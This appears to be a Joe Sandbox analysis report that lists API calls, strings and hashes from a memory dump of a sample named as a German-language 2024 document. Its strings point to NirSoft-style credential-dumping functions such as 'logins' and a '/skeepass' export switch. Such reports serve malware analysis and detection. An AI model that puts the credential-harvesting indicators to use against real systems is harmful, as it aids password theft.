                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                            • String ID: logins$null
                                                            • API String ID: 2148543256-2163367763
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • memset.MSVCRT ref: 004085CF
                                                            • memset.MSVCRT ref: 004085F1
                                                            • memset.MSVCRT ref: 00408606
                                                            • strcmp.MSVCRT ref: 00408645
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                            • memset.MSVCRT ref: 0040870E
                                                            • strcmp.MSVCRT ref: 0040876B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                            • String ID: ---
                                                            • API String ID: 3437578500-2854292027
                                                            APIs
                                                            • memset.MSVCRT ref: 0041087D
                                                            • memset.MSVCRT ref: 00410892
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                            • String ID:
                                                            • API String ID: 1010922700-0
                                                            APIs
                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                            • malloc.MSVCRT ref: 004186B7
                                                            • free.MSVCRT ref: 004186C7
                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                            • free.MSVCRT ref: 004186E0
                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                            • malloc.MSVCRT ref: 004186FE
                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                            • free.MSVCRT ref: 00418716
                                                            • free.MSVCRT ref: 0041872A
                                                            • free.MSVCRT ref: 00418749
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$FullNamePath$malloc$Version
                                                            • String ID: |A
                                                            • API String ID: 3356672799-1717621600
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                            • API String ID: 2081463915-1959339147
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2012295524-70141382
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule
                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                            • API String ID: 667068680-3953557276
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                            • String ID:
                                                            • API String ID: 1700100422-0
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                            • String ID:
                                                            • API String ID: 552707033-0
                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                            • strchr.MSVCRT ref: 0040C140
                                                            • strchr.MSVCRT ref: 0040C151
                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                            • memset.MSVCRT ref: 0040C17A
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                            • String ID: 4$h
                                                            • API String ID: 4066021378-1856150674
                                                            • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                            • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: %%0.%df
                                                            • API String ID: 3473751417-763548558
                                                            • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                            • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                            APIs
                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                            • GetParent.USER32(?), ref: 00406136
                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                            • String ID: A
                                                            • API String ID: 2892645895-3554254475
                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                            APIs
                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                            • memset.MSVCRT ref: 0040DA23
                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                            • String ID: caption
                                                            • API String ID: 973020956-4135340389
                                                            • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                            • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                            APIs
                                                            Strings
                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf$wcscpy
                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                            • API String ID: 1283228442-2366825230
                                                            • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                            • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                            APIs
                                                            • wcschr.MSVCRT ref: 00413972
                                                            • wcscpy.MSVCRT ref: 00413982
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            • wcscpy.MSVCRT ref: 004139D1
                                                            • wcscat.MSVCRT ref: 004139DC
                                                            • memset.MSVCRT ref: 004139B8
                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                            • memset.MSVCRT ref: 00413A00
                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                            • wcscat.MSVCRT ref: 00413A27
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                            • String ID: \systemroot
                                                            • API String ID: 4173585201-1821301763
                                                            • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                            • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy
                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                            • API String ID: 1284135714-318151290
                                                            • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                            • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                            • String ID: 0$6
                                                            • API String ID: 4066108131-3849865405
                                                            • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                            • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                            APIs
                                                            • memset.MSVCRT ref: 004082EF
                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                            • memset.MSVCRT ref: 00408362
                                                            • memset.MSVCRT ref: 00408377
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMultiWide
                                                            • String ID:
                                                            • API String ID: 290601579-0
                                                            • Opcode ID: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                            • Opcode Fuzzy Hash: aaab377460abc89c7af8afd87b5e46c7bf1c7e9fcd5a4a68ffd212283bf1634f
                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                            APIs
                                                            • memchr.MSVCRT ref: 00444EBF
                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                            • memset.MSVCRT ref: 0044505E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
